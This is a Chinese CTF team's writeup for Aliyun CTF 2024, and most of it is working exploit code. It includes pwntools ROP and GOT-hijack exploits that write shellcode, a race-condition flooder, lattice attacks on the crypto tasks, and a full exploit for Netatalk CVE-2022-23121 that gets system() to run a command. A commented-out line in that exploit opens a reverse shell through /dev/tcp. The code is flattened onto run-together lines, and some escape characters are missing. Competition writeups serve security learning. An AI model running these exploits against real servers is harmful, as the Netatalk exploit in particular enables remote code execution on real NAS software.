阿里云CTF 2024 writeup

WriteUp 4个月前 admin
205 0 0

由杭州电子科技大学Vidar战队、西安电子科技大学L战队、电子科技大学CNSS战队以及杭州凌武科技有限公司凌武实验室战队联合组成的El3ctronic战队,在阿里云CTF 2024中,面对国内外各大强队,获得了第四名的佳绩!

阿里云CTF 2024 writeup



  • web签到

  • Pastbin

  • easyCAS


  • 欧拉


  • Pwn sign in

  • klang

  • Netatalk


  • BabyDH1

  • BabyDH2

  • Doctored Dobbertin v2


  • 帕鲁情感管理



阿里云CTF 2024 writeup



func (rtr *Router) Handle(method string, pattern string, handlers []Handler) {    rtr.handle(method, pattern, func(resp http.ResponseWriter, req *http.Request) {       c := rtr.m.createContext(resp, req)       for _, h := range handlers {          c.mws = append(c.mws, getMWFromHandler(h))       }       c.run()    })} 


阿里云CTF 2024 writeup


package main
import (    "fmt"    "io"    "log"    "net/http"    "os"    "strings")
var url = "http://web2.aliyunctf.com:35084"
func main() {    limiter1 := make(chan struct{}, 64)    limiter2 := make(chan struct{}, 32)    go func() {       for {          limiter1 <- struct{}{}          go func() {             if SendSlash() {                os.Exit(0)             }          }()          <-limiter1          limiter1 <- struct{}{}          go func() {             if SendSlash() {                os.Exit(0)             }          }()          <-limiter1          <-limiter2       }    }()    var i = 0    go func() {       for {          limiter2 <- struct{}{}          i++          fmt.Println("try", i)          go func() {             if SendFlag() {                os.Exit(0)             }          }()       }    }()    select {}}
func SendSlash() bool {    get, err := http.Get(url + "/")    if err != nil {       log.Println(err)    }    if get != nil {       defer get.Body.Close()       return checkBody(get.Body)    }    return false}
func SendFlag() bool {    get, err := http.Get(url + "/flag")    if err != nil {       log.Println(err)    }    if get != nil {       defer get.Body.Close()       return checkBody(get.Body)    }    return false}
func checkBody(rd io.Reader) bool {    data, _ := io.ReadAll(rd)    if data == nil {       return false    }    if strings.Contains(string(data), "aliyunctf{") {       fmt.Println(string(data))       return true    }    return false}


阿里云CTF 2024 writeup


阿里云CTF 2024 writeup




#include<bits/stdc++.h>int mmm={...};int e[10][10],use[10][10];int flag[20];void dfs(int u,int len){    flag[len]=u;    if(len==17){        if(flag[1]>flag[2] && flag[3]<flag[4]&&flag[0] == flag[8]&&flag[11] == flag[15]&&flag[10] > flag[5]&&flag[3] < flag[13]&&flag[7] < flag[4]&&flag[14] == 7&&flag[17] == 4){            for(int i=0;i<18;i++)                printf("%d",flag[i]);            puts("");            exit(0);        }        return;    }    for(int v=0;v<9;v++)        if(e[u][v]&&!use[u][v]){            use[u][v]=use[v][u]=1;            dfs(v,len+1);            use[u][v]=use[v][u]=0;        }}int main(){    freopen("1.out","w",stdout);    for(int i=0;i<9;i++){        for(int j=0;j<9;j++){            e[i][j]=mmm[i*9+j];            // printf("%d ",e[i][j]);        }        // puts("");    }    for(int i=0;i<9;i++)        dfs(i,0);    return 0;} 



Pwn sign in 



阿里云CTF 2024 writeup
阿里云CTF 2024 writeup

leak libc:

def show_ptr():    nums = [0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1]    io.sendlineafter(b'hhh', b'1')    io.sendlineafter(b'size', str(0x500).encode())    io.send(b'n')    for i in nums:        io.sendline(str(i).encode())    io.sendlineafter(b'hhh', b'2') 


#!/usr/bin/python3.8# -*- encoding: utf-8 -*-from pwn import *from ctools import *
context(os="linux", arch="amd64", terminal=['tmux', 'splitw', '-h', '-F' '{pane_pid}', '-P']) # context.log_level = "debug"
proc = './pwn-sign_in'libc_path = './libc-2.31.so'
init_proc_with_libc(proc, libc_path)DEBUG = lambda script = '': gdb.attach(io, gdbscript=script)
# io = process([proc])# io = process(['./ld-2.23.so', proc], env={'LD_PRELOAD': libc_path})io = remote('pwn0.aliyunctf.com', 9999)
elf = ELF(proc)libc = ELF(libc_path, checksec=False)

def assign_val(chunk_size, data, arrays):    io.sendafter(b"hhhn", b"1".ljust(4, b"x00"))    io.sendlineafter(b"size???n", str(chunk_size).encode())    io.sendline(data)    io.recvline(b"Lucky Numbersn")    for i in arrays:        io.sendline(str(i).encode())

def get_array(*indexs):    arr = [0] * 16    for i in indexs:        arr[i] = 3    return arr

def leak_addr():    arr = get_array(15, 13, 2, 3, 4, 14)    assign_val(0x500, b"a"*8, arr)    io.sendafter(b"hhhn", b"2".ljust(4, b"x00"))    # libc_base = recv_libc_addr(io, offset=0x1ebbe0)    # log_libc_base_addr(libc_base)
   io.recvuntil(b'a' * 0x8)        libc.address = u64(io.recv(6).ljust(8, b'x00')) - 0x1ebbe0 - 0x1000    success(hex(libc.address))

def rop_attack():    arr = get_array(15, 1, 2, 3, 4, 14, 6)    assign_val(0x10, b"deadbeef", arr)    io.sendafter(b"hhhn", b"2".ljust(4, b"x00"))    io.sendafter(b"xmkin", cyclic(0x200, n=8))    for _ in range(0x42):        io.sendline(str(0x61616161).encode())    io.sendline(b"-")    io.sendline(b"-")    io.sendline(str(0x61616161).encode())    io.sendline(str(0x61616161).encode())
   rop = ROP(libc)    target_addr = libc.symbols['__free_hook'] + 0x10    rop.call('read', [0, target_addr, 0x100])    rop.call('open', [target_addr, 0, 0])    rop.call('read', [3, target_addr, 0x50])    rop.call('write', [1, target_addr, 0x50])    payload = p64(libc.address + 0x119434) + rop.chain()    print(rop.dump())
   for i in range(0, len(payload), 4):        num = u32(payload[i:i+4])        io.sendline(str(num).encode())    # DEBUG('b * $rebase(0x2512)')    for _ in range(0x200-0x42-4-(len(payload) // 4)):        io.sendline(str(0x61616161).encode())        sleep(1)    io.sendline(b'/flag.txtx00')

def exp():    leak_addr()    rop_attack()
if __name__ == "__main__":    exp()


I tried to write a toy compiler from scratch, but it's buggy af. Hopefully it's not insecure!nc pwn2.aliyunctf.com 9999attachment 

手动加 #include<functional>

function printNumbers(int n) : int i -> void{    i := 0;    do {        printi(i);        i := i + 1;    } while (i <= n);    return;}
function arrayTest() : int i, array arr -> void {    i := 0;    arr := array_new(10);    do {        printi(arr[0]);        i := i + 1;    } while (i <= 10);    return;}
function main() : -> int {    prints("123");    printNumbers(10);    arrayTest();    return 0;}

看 AST.cpp 比较清楚

编译命令(要把 wrapper.S 和 main.c 还有 api.c 一起链接):

gcc -no-pie -o out ./out.S ./src/runtime/wrapper.S ./src/runtime/main.c ./src/runtime/api.c 

可以把 ASAN 打开编译一次再 Fuzz,改这一行就行:

阿里云CTF 2024 writeup


ASAN_OPTIONS=detect_leaks=0 ./src/build/compiler/klang_asan ./1.k 

(不知道哪里搞错了fuzz没跑起来(( afl-fuzz 说我的种子直接crash 了, 但是我自己手动跑是可以的((


klang/src/build via △ v3.28.3 ❯ echo $ASAN_OPTIONSdetect_leaks=0,abort_on_error=1,symbolize=0
klang/src/build via △ v3.28.3 ❯ ./compiler/klang out_dir/default/queue/id:000000,time:0,execs:0,orig:a
klang/src/build via △ v3.28.3 ❯ echo $?           0
klang/src/build via △ v3.28.3 ❯ afl-fuzz -i ./in_dir -o ./out_dir -- ./compiler/klang @@              afl-fuzz++4.08c based on afl by Michal Zalewski and a large online community[+] AFL++ is maintained by Marc "van Hauser" Heuse, Dominik Maier, Andrea Fioraldi and Heiko "hexcoder" Eißfeldt[+] AFL++ is open source, get it at https://github.com/AFLplusplus/AFLplusplus[+] NOTE: AFL++ >= v3 has changed defaults and behaviours - see README.md[+] Enabled environment variable ASAN_OPTIONS with value detect_leaks=0,abort_on_error=1,symbolize=0[+] No -M/-S set, autoconfiguring for "-S default"[*] Getting to work...[+] Using exponential power schedule (FAST)[+] Enabled testcache with 50 MB[+] Generating fuzz data with a length of min=1 max=1048576[*] Checking core_pattern...[*] Checking CPU scaling governor...[+] You have 20 CPU cores and 3 runnable tasks (utilization: 15%).[+] Try parallel jobs - see /usr/share/doc/aflplusplus-4.08c-r1/fuzzing_in_depth.md#c-using-multiple-cores[*] Setting up output directories...[+] Output directory exists but deemed OK to reuse.[*] Deleting old session data...[+] Output dir cleanup successful.[*] Checking CPU core loadout...[+] Found a free CPU core, try binding to #0.[*] Scanning './in_dir'...[+] Loaded a total of 1 seeds.[*] Creating hard links for all input files...[*] Validating target binary...[*] Spinning up the fork server...[+] All right - fork server is up.[*] Target map size: 11357[*] No auto-generated dictionary tokens to reuse.[*] Attempting dry run with 'id:000000,time:0,execs:0,orig:a'...
[-] Oops, the program crashed with one of the test cases provided. There are    several possible explanations:
   - The test case causes known crashes under normal working conditions. If      so, please remove it. The fuzzer should be seeded with interesting      inputs - but not ones that cause an outright crash.
   - In QEMU persistent mode the selected address(es) for the loop are not      properly cleaning up variables and memory. Try adding      AFL_QEMU_PERSISTENT_GPR=1 or select better addresses in the binary.
   - Least likely, there is a horrible bug in the fuzzer. If other options      fail, poke the Awesome Fuzzing Discord for troubleshooting tips.[!] WARNING: Test case 'id:000000,time:0,execs:0,orig:a' results in a crash, skipping[+] All test cases processed.
[-] PROGRAM ABORT : We need at least one valid input seed that does not crash!         Location : main(), src/afl-fuzz.c:2388

有 @@ 可以不用 — 了

试了也不行, 改了persistent跑起来了


ASAN_OPTIONS=detect_leaks=0,abort_on_error=1,symbolize=0 afl-fuzz -i ./fuzz/in -o ./fuzz/out ./src/build/compiler/klang @@ 
阿里云CTF 2024 writeup

就是开了 ASAN 跑起来感觉误报不少

阿里云CTF 2024 writeup

flex scanner jammed, 得改改(((

把 lexererror 改成直接返回, parse 的时候catch一下error, 可以过滤掉 parse 不了而报的错


阿里云CTF 2024 writeup

筛了一下, 就是 “” 就能触发

阿里云CTF 2024 writeup

一个猜想,漏洞会不会在 IR 生成时用的 Optimize.cpp,导致生成了一些有漏洞的 ASM

  • 优化内容:

  • 常量传播

  • 复制传播

  • 公共子表达式消除(CSE)

  • 死代码消除(DCE)


  • 指针/别名分析好像不太充分

临时变量声明了 string 但是不初始化的时候默认是 NULL,直接给 prints 会段错误,如果在后面再加一个初始化和 prints 可以抵消这个优化,使得第一次 prints 的时候打印一些垃圾数据造成 leak,如果改成数组的话应该可以写?这个垃圾数据的地址来自 RCX,如果想办法控制了 RCX 可以任意地址干点事。

function tester() : int a, string s -> void {    printi(a);    prints(s);    s := "Hello World!";    prints(s);    return;}
function main() : -> int {    tester();    return 0;}
阿里云CTF 2024 writeup


Allocatables[] = { RCX, R8, R9, R10, R11, RSI, RDI }; 

加一层 wrapper 再去调用 vuln 就可以控制 RCE 并造成类型混淆

任意地址读 get:

阿里云CTF 2024 writeup

目前已经实现任意地址读,和任意地址写,栈上可以写 shellcode

function get_int(int i) : -> int {    return i;}
function arb_read() : string s1 -> void {    prints(s1);    s1 := "A";    prints(s1);    return;}
function do_leak() : int s1, int addr -> void {    prints("addr2leak:");    addr := inputi();    prints("arb_read:");    s1 := get_int(addr);    arb_read();    return;}
function write_gadget(int data) : array a1 -> void {    a1[0] := data;    a1 := array_new(1); /* do not opt me !*/    return;}
function arb_write(int fa, int data) : int a1 -> void {    a1 := fa;    write_gadget(data);    printi(a1);    return;}
function do_write() : array a1, int dp, int wp, int wd -> void {    prints("array_leak:");    a1 := array_new(0x10);    arb_read();    prints("dp:");    dp := inputi();    prints("wp:");    wp := inputi();    prints("wd:");    wd := inputi();    a1[0] := wp;    a1[1] := 1;    arb_write(dp, wd);    return;}
function main() : int t, int i -> int {    do_leak();    do_leak();    i := 12;    do {        do_write();        i := i -1;    }    while (i >= 0);    do_write();    prints("trigger");    return 0;}


from pwn import *
#p = process("./out", env={"LD_PRELOAD":"./libc-2.31.so"})p = process("./out")context.log_level = "debug"context.arch = "amd64"elf = ELF("./out")libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elb_base = 0x400000puts_got = 0x404018
def arb_write(addr, data):    # leak data_ptr    p.recvuntil(b"array_leak:n")    data_ptr = u64(p.recvuntil(b"n", drop=True).ljust(8, b"x00"))    print("data_ptr:", hex(data_ptr))    p.recvuntil(b"dp:n")    p.sendline(str(data_ptr).encode())    # arb_write test    p.recvuntil(b"wp:n")    p.sendline(str(addr).encode())    p.recvuntil(b"wd:n")    p.sendline(str(data).encode())
def exp():    #gdb.attach(p, "b *0x4012c4ncn")    # leak libc    p.recvuntil(b"addr2leak:n")    p.sendline(str(puts_got).encode())    p.recvuntil(b"arb_read:n")    puts = u64(p.recvuntil(b"n", drop=True).ljust(8, b"x00"))    print("puts:", hex(puts))    libc_base = puts - libc.symbols["puts"]    print("libc_base:", hex(libc_base))    environ = libc_base + libc.symbols["environ"]    print("environ:", hex(environ))    # leak libc    p.recvuntil(b"addr2leak:n")    p.sendline(str(environ).encode())    p.recvuntil(b"arb_read:n")    stack_leak = u64(p.recvuntil(b"n", drop=True).ljust(8, b"x00"))    print("stack_leak:", hex(stack_leak))
   # write shellcode to stack    shellcode = asm(shellcraft.sh())    # ajust shellcode to 4 bytes align    shellcode = shellcode.ljust((len(shellcode) + 3) & ~3, b"x90")    print("shellcode len:", hex(len(shellcode)))    for i in range(len(shellcode)//4):        arb_write(stack_leak + i*4, u32(shellcode[i*4:i*4+4]))        print("write done:", i)
   # hijack puts    arb_write(puts_got, stack_leak)    
   gdb.attach(p)    p.interactive()
if __name__ == "__main__":    exp()
阿里云CTF 2024 writeup

Final EXP:


本地编译:./bin/klang ./exp.k && gcc -no-pie -o out out.S src/runtime/wrapper.S ./src/runtime/main.c ./src/runtime/api.c

压缩了空间,远程限制 1024 字节

function get_int(int i) : -> int {    return i;}function arb_read() : string s1 -> void {    prints(s1);    s1 := "A";    prints(s1);    return;}function do_leak() : int s1, int addr -> void {    prints("addr2leak:");    addr := inputi();    prints("arb_read:");    s1 := get_int(addr);    arb_read();    return;}function write_gadget(int data) : array a1 -> void {    a1[0] := data;    a1 := array_new(1); /* do not opt me !*/    return;}function arb_write(int fa, int data) : int a1 -> void {    a1 := fa;    write_gadget(data);    printi(a1);    return;}function do_write() : array a1, int dp, int wp, int wd -> void {    prints("array_leak:");    a1 := array_new(0x10);    arb_read();    prints("dp:");    dp := inputi();    prints("wp:");    wp := inputi();    prints("wd:");    wd := inputi();    a1[0] := wp;    a1[1] := 1;    arb_write(dp, wd);    return;}function main() : int t, int i -> int {    do_leak();    do_leak();    i := 12;    do {        do_write();        i := i -1;    }    while (i >= 0);    do_write();    prints("trigger");    return 0;}END_OF_SNIPPET 


from pwn import *import hashlib, string, struct, sys
#p = process("./out", env={"LD_PRELOAD":"./libc-2.31.so"})p = remote("pwn2.aliyunctf.com", 9999)#p = process("./out")context.log_level = "debug"context.arch = "amd64"#elf = ELF("./out")libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elb_base = 0x400000puts_got = 0x404018
def solve_pow(chal, n):  r = 0  while True:    s = chal + struct.pack("<Q", r)    h = int(hashlib.sha256(s).hexdigest(), 16)    if h % (2 ** n) == 0:      break    r += 1  return r
def arb_write(addr, data):    # leak data_ptr    p.recvuntil(b"array_leak:n")    data_ptr = u64(p.recvuntil(b"n", drop=True).ljust(8, b"x00"))    print("data_ptr:", hex(data_ptr))    p.recvuntil(b"dp:n")    p.sendline(str(data_ptr).encode())    # arb_write test    p.recvuntil(b"wp:n")    p.sendline(str(addr).encode())    p.recvuntil(b"wd:n")    p.sendline(str(data).encode())
def exp():    p.recvuntil(b"Give me your team token.n")    p.sendline(b"SuSarzbhSn2LApDv8+1V3Q==")    p.recvuntil(b"./pow_solver.py ")    chal = p.recvuntil(b" ", drop=True)    n = int(p.recvuntil(b" ", drop=True).decode())    print(F"POW({chal.decode()}, {n})")    pow_res = solve_pow(chal, n)    print("pow_res:", pow_res)    p.sendline(str(pow_res).encode())
   p.recvuntil(b"(excluding quote).n")    with open("exp.k", "rb") as f:        p.sendline(f.read())
   #gdb.attach(p, "b *0x4012c4ncn")    # leak libc    p.recvuntil(b"addr2leak:n")    p.sendline(str(puts_got).encode())    p.recvuntil(b"arb_read:n")    puts = u64(p.recvuntil(b"n", drop=True).ljust(8, b"x00"))    print("puts:", hex(puts))    libc_base = puts - libc.symbols["puts"]    print("libc_base:", hex(libc_base))    environ = libc_base + libc.symbols["environ"]    print("environ:", hex(environ))    # leak libc    p.recvuntil(b"addr2leak:n")    p.sendline(str(environ).encode())    p.recvuntil(b"arb_read:n")    stack_leak = u64(p.recvuntil(b"n", drop=True).ljust(8, b"x00"))    print("stack_leak:", hex(stack_leak))
   # write shellcode to stack    shellcode = asm(shellcraft.sh())    # ajust shellcode to 4 bytes align    shellcode = shellcode.ljust((len(shellcode) + 3) & ~3, b"x90")    print("shellcode len:", hex(len(shellcode)))    for i in range(len(shellcode)//4):        arb_write(stack_leak + i*4, u32(shellcode[i*4:i*4+4]))        print("write done:", i)
   # hijack puts    arb_write(puts_got, stack_leak)
   p.sendline("cat /flag")    
   #gdb.attach(p)    p.interactive()
if __name__ == "__main__":    exp()
阿里云CTF 2024 writeup


CVE-2022-23121 https://research.nccgroup.com/2022/03/24/remote-code-execution-on-western-digital-pr4100-nas-cve-2022-23121/

给的 example 已经伪造好了能够触发漏洞的 resource fork, 接下来调用 FPOpenFork 打开 test_file, 需要设置 flag = 2.

利用这句将栈上的 libc 地址写到 ad->data 中, 然后 munmap 写到 resource fork 文件中.


直接读取不能从头开始读, 泄漏不了写在 0x32 的地址.

一翻乱玩发现 FPOpenFork 在有 test_file 时不能直接打开 ._test_file 并读取, 但是如果只有 ._test_file 时会看作普通的文件. 于是调整了一下创建文件的顺序, 先创建 ._test_file 然后不 close 文件保留 fork fd, 触发后用最开始打开的 fork fd 读取可以.

利用下面这句, 将 ld 上的 _dl_rtld_lock_recursive 改写成 system, 同时将 _dl_load_lock 写上命令.

memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,        map + ad_getentryoff(ad, ADEID_RFORK),        ad_getentrylen(ad, ADEID_RFORK)); 

虽然之后 ad_rebuild_adouble_header_osx 会导致段错误, 但是依旧能够走到 ld 中去退出, 从而触发 system.

反弹 shell 没成功不知道为什么, 把 flag copy 到 /home/xxxx/shared 下, 用 APF 读取.

#! /usr/bin/env python3# -*- coding: utf-8 -*-#from pwn import *context(arch = 'i386', os = 'linux', endian='little')context.log_level = 'info'
libc = ELF('libc-2.27.so')ld = ELF('ld-2.27.so')
import socketimport structimport sysimport timefrom afputils import *
# Helper function to create AppleDouble metadata header# you can modify the header as you want...def createAppleDouble_leak():  header = p32(0x51607)                     #Magic number double  header += p32(0x20000)                    #Version number  header += p8(0) * 16                      #Filler  header += p16(2)                          #Number of entries  header += p32(9)                          #Entry Id Finder Info  header += pack(0x7fa, 32, 'big', True)         # offset  header += p32(30)                         # Set length other than 32 to call 'ad_convert_osx'  header += p32(2)                          # Type Ressource fork  header += p32(0x100)                      # #Control the mmap size  header += p32(0)                          # length  ############  # usefull to find adouble offset  ###########  header += b'abcdefghijklmnopqrstuvwzxy1234567890'  return header
def createAppleDouble_write(system):  header = p32(0x51607)                     #Magic number double  header += p32(0x20000)                    #Version number  header += p8(0) * 16                      #Filler  header += p16(2)                          #Number of entries  header += p32(9)                          #Entry Id Finder Info  header += pack(0x4504, 32, 'big', True)         # offset  header += p32(30)                         # Set length other than 32 to call 'ad_convert_osx'  header += p32(2)                          # Type Ressource fork  header += p32(0x32)                      # #Control the mmap size  header += p32(0x32c + 8)                          # length  ############  # usefull to find adouble offset  ###########  # header += b'bash -i >& /dev/tcp/ 0>&1x00'.ljust(0x32c) + p32(system, endian='little')  header += b'cat /flag.txt > /home/xxxx/shared/flagx00'.ljust(0x32c) + p32(system, endian='little')  return header
# ip and port of the local netatalk serverip = ""port = 5548volume = "Shared"
p = connect(ip, port)response, request_id = DSIOpenSession(p, debug)response, request_id = FPLogin(p, request_id, b'AFP3.3', b'No User Authent', None, debug)response, request_id, volume_id = FPOpenVol(p, request_id, 0x21, bytes(volume,encoding='utf-8'), None, debug)
# rm fileresponse, request_id = FPDelete(p, request_id, volume_id, 2, 2, b"test_file")response, request_id = FPDelete(p, request_id, volume_id, 2, 2, b"test_file_2")response, request_id = FPDelete(p, request_id, volume_id, 2, 2, b"._test_file")response, request_id = FPDelete(p, request_id, volume_id, 2, 2, b"._test_file_2")
# create an appledouble metadata headerappledouble = createAppleDouble_leak()# create an appledouble metadata file for "test_file"response, request_id = FPCreateFile(p, request_id, volume_id, 2, 2, b"._test_file", debug)response, request_id, fork2 = FPOpenFork(p, request_id, 0, volume_id, 2, 0, 3, 2, b"._test_file", debug)response, request_id = FPWriteExt(p, request_id, fork2, 0, len(appledouble), appledouble, debug)# close file# response, request_id = FPCloseFork(p, request_id, fork2, debug)
# create a simple file named "test_file" with data insideresponse, request_id = FPCreateFile(p, request_id, volume_id, 2, 2, b"test_file", debug)response, request_id, fork1 = FPOpenFork(p, request_id, 0, volume_id, 2, 0, 3, 2, b"test_file", debug)
data = b'Hello World !'
# write data into the fileresponse, request_id = FPWriteExt(p, request_id, fork1, 0, len(data), data, debug)# close file# response, request_id = FPCloseFork(p, request_id, fork1, debug)
# leakresponse, request_id, fork3 = FPOpenFork(p, request_id, 2, volume_id, 2, 0, 3, 2, b"test_file", debug)response, request_id = FPReadExt(p, request_id, fork2, 0x32, 4, debug)libc.address = u32(response[0x10:], endian = 'little') - 0x170e7print(hex(libc.address))# response, request_id = FPCloseFork(p, request_id, fork3, debug)
# create an appledouble metadata headerappledouble = createAppleDouble_write(libc.sym.system)# create an appledouble metadata file for "test_file"response, request_id = FPCreateFile(p, request_id, volume_id, 2, 2, b"._test_file_2", debug)response, request_id, fork2 = FPOpenFork(p, request_id, 0, volume_id, 2, 0, 3, 2, b"._test_file_2", debug)response, request_id = FPWriteExt(p, request_id, fork2, 0, len(appledouble), appledouble, debug)# close file# response, request_id = FPCloseFork(p, request_id, fork2, debug)
# create a simple file named "test_file" with data insideresponse, request_id = FPCreateFile(p, request_id, volume_id, 2, 2, b"test_file_2", debug)response, request_id, fork1 = FPOpenFork(p, request_id, 0, volume_id, 2, 0, 3, 2, b"test_file_2", debug)
data = b'Hello World !'
# write data into the fileresponse, request_id = FPWriteExt(p, request_id, fork1, 0, len(data), data, debug)# close file# response, request_id = FPCloseFork(p, request_id, fork1, debug)
# triggertry:  response, request_id, fork3 = FPOpenFork(p, request_id, 2, volume_id, 2, 0, 3, 2, b"test_file_2", debug)except Exception as e:  pass
DSICloseSession(p, request_id, debug)
p = connect(ip, port)response, request_id = DSIOpenSession(p, debug)response, request_id = FPLogin(p, request_id, b'AFP3.3', b'No User Authent', None, debug)response, request_id, volume_id = FPOpenVol(p, request_id, 0x21, bytes(volume,encoding='utf-8'), None, debug)
response, request_id, fork4 = FPOpenFork(p, request_id, 0, volume_id, 2, 0, 3, 2, b"flag", debug)response, request_id = FPReadExt(p, request_id, fork4, 0, 0x100, debug)print(response[0x10:])
DSICloseSession(p, request_id, debug)p.close()



直接传 Bob_pk,然后二元 Coppersmith 去解 shared_AB。


#final exp
from sage.all import *from Crypto.Cipher import AESfrom ecdsa import NIST256pfrom ecdsa.ecdsa import Public_keyfrom ecdsa.ellipticcurve import Pointfrom hashlib import sha256from os import urandomfrom random import seed, choice, randrangefrom signal import signal, alarm, SIGALRMfrom string import ascii_letters, ascii_lowercase, digitsfrom sys import stdinfrom pwn import *

E = NIST256p.curvem = 2**211p=int(E.p())Fp=GF(p)El=EllipticCurve(GF(p),[E.a(),E.b()])
def proof(r):    text=r.recvline()    print(text)    tmp=text.split(b'XXXX + ')[-1]    suf,val=tmp.strip().split(b') == ')    suf=suf.decode()    val=val.decode()    poss=ascii_letters + digits    for a in poss:        for b in poss:            for c in poss:                for d in poss:                    digest = sha256((a+b+c+d+suf).encode()).hexdigest()                    if(digest==val):                        r.sendline((a+b+c+d).encode())                        return
def get_Ax_Bx_encsign(r):    text=r.recvuntil(b'Now, it is your turn:')    print(text.decode())    text=text.split(b'Hi, Bob! Here is my public key: ')[-1]    Ax,text=text.split(b'nHi, Alice! Here is my public key: ')    Bx,enc_sign=text.split(b'n')[:2]    print(Ax,Bx,enc_sign)    return int(Ax.decode(),16),int(Bx.decode(),16),bytes.fromhex(enc_sign.decode())
def send_point(r,P):    px,py=P[0],P[1]    print(hex(px))    r.sendline(hex(px)[2:].encode())    r.sendline(hex(py)[2:].encode())    def get_leak(r):    text=r.recvuntil(b'Leak: ')    text=r.recv()    print(text)    lx,ly=text.split(b', ')    return int(lx.decode(),16),int(ly.decode(),16)    r=remote("crypto0.aliyunctf.com","12346")proof(r)Ax,Bx,enc_sign=get_Ax_Bx_encsign(r)print(enc_sign.hex())send_point(r,El.lift_x(Fp(Bx)))low_x,low_y=get_leak(r)
from re import findallfrom subprocess import check_output
def flatter(M):    # compile https://github.com/keeganryan/flatter and put it in $PATH    z = "[[" + "]n[".join(" ".join(map(str, row)) for row in M) + "]]"    ret = check_output(["flatter"], input=z.encode())    return matrix(M.nrows(), M.ncols(), map(int, findall(b"-?\d+", ret)))
def find_root(p, f, bounds, m, t):    # print(bounds)    f /= f.coefficients().pop(0)    # print(f)    f = f.change_ring(ZZ)    pr=f.parent()    x,y=pr.gens()        G = Sequence([], f.parent())    for k in range(m+1):        g=f**k*p**(m-k)        for j in range(2*(m-k)+t+1):            G.append(g*y**j)        for i in range(2):            g*=x            for j in range(2*(m-k)+t-1):                G.append(g*y**j)        B, monomials = G.coefficient_matrix()    monomials = vector(monomials)
   factors = [monomial(*bounds) for monomial in monomials]    for i, factor in enumerate(factors):        B.rescale_col(i, factor)    B = flatter(B.dense_matrix())    B = B.change_ring(QQ)    for i, factor in enumerate(factors):        B.rescale_col(i, 1/factor)
   H = Sequence([], f.parent().change_ring(QQ))    for h in filter(None, B*monomials):        H.append(h)    return H
R.<x,y>=PolynomialRing(Fp)x,y=R.gens()B=p//m//2f=((y+B)*m+low_y)^2-((x+B)*m+low_x)^3-int(E.a())*((x+B)*m+low_x)-int(E.b())indexx = 10mypols = find_root(p,f,[B,B],6,1)[:indexx]
def find_prime_root(pp, idx):    root = []    PRs = PolynomialRing(GF(pp), 2,'a,b', order='lex')    a,b = PRs.gens()    mynew_pol = []    for i in mypols:        mynew_pol.append(PRs(i))    I1 = ideal(mynew_pol)    GB = I1.groebner_basis()    res = GB[-1].univariate_polynomial().roots()    if len(res) == 1:        ans = int(res[0][0])        root.append(ans)    else:        return []    res = GB[-2](b=root[0]).univariate_polynomial().roots()    if len(res) == 1:        ans = int(res[0][0])        root.append(ans)    else:        return []    root.append(pp)    sec[idx] = root
base = primes_first_n(30)[3:]sec = [0]*len(base)threads = []for i in range(len(base)):    find_prime_root(base[i], i)xi = []yi = []pp = []for root in sec:    if root:        yi.append(root[0])        xi.append(root[1])        pp.append(root[2])
def find_real(xx,yy,f):    if(f(xx,yy)==0):        return xx,yy    if(f(xx-P,yy)==0):        return xx-P,yy    if(f(xx,yy-P)==0):        return xx,yy-P    if(f(xx-P,yy-P)==0):        return xx-P,yy-Preal_x,real_y=find_real(xx,yy,f)shared_AB=(real_x+B)*m+low_x,(real_y+B)*m+low_yprint(shared_AB)
key = sha256(str(shared_AB).encode()).digest()sign=AES.new(key,AES.MODE_ECB).decrypt(enc_sign).split(b'Secret sign is ')[-1]r.sendline(AES.new(key,AES.MODE_ECB).encrypt(sign[:-1]).hex().encode())print(r.recvall())
# aliyunctf{Coppersmith_in_the_wild!}


Xu J 论文https://eprint.iacr.org/2022/1239.pdf

阿里云CTF 2024 writeup
阿里云CTF 2024 writeup


传 (Bob_pk+[t]G),得到 Alice_sk*Bob_pk+Alice_sk*[t]*G=shared_AB+[t]*Alice_pk,就是论文里的形式。

#final exp
from sage.all import *from Crypto.Cipher import AESfrom ecdsa import NIST256pfrom ecdsa.ecdsa import Public_keyfrom ecdsa.ellipticcurve import Pointfrom hashlib import sha256from os import urandomfrom random import seed, choice, randrangefrom signal import signal, alarm, SIGALRMfrom string import ascii_letters, ascii_lowercase, digitsfrom sys import stdinfrom pwn import *from re import findallfrom subprocess import check_output
E = NIST256p.curvem = 2**164p=int(E.p())Fp=GF(p)El=EllipticCurve(GF(p),[E.a(),E.b()])
def proof(r):    text=r.recvline()    print(text)    tmp=text.split(b'XXXX + ')[-1]    suf,val=tmp.strip().split(b') == ')    suf=suf.decode()    val=val.decode()    poss=ascii_letters + digits    for a in poss:        for b in poss:            for c in poss:                for d in poss:                    digest = sha256((a+b+c+d+suf).encode()).hexdigest()                    if(digest==val):                        r.sendline((a+b+c+d).encode())                        return
def get_Ax_Bx_encsign(r):    text=r.recvuntil(b'Now, it is your turn:')    # print(text.decode())    text=text.split(b'Hi, Bob! Here is my public key: ')[-1]    Ax,text=text.split(b'nHi, Alice! Here is my public key: ')    Bx,enc_sign=text.split(b'n')[:2]    return int(Ax.decode(),16),int(Bx.decode(),16),bytes.fromhex(enc_sign.decode())
def send_point(r,P):    px,py=P[0],P[1]    r.sendline(hex(px)[2:].encode())    r.sendline(hex(py)[2:].encode())    text=r.recvuntil(b'Leak: ')    print(text)    text=r.recvline().strip()    print(text)    return int(text.decode(),16)
E = NIST256p.curveG = NIST256p.generatorm = 2**164n = G.order()Fp=GF(p)a=int(E.a())b=int(E.b())El=EllipticCurve(GF(p),[a,b])
def flatter(M):    # compile https://github.com/keeganryan/flatter and put it in $PATH    z = "[[" + "]n[".join(" ".join(map(str, row)) for row in M) + "]]"    ret = check_output(["flatter"], input=z.encode())    return matrix(M.nrows(), M.ncols(), map(int, findall(b"-?\d+", ret)))
a=int(E.a())b=int(E.b())p=int(E.p())PR = PolynomialRing(Zmod(p),'e',6)es = PR.gens()e0,e1,e2,e3,e4,e5 = esmmm = mB=p//mmmB0=B//2leak0 = send_point(r,pk_B+0*pk_G)gabx = leak0 + mmm * (e0+B0)
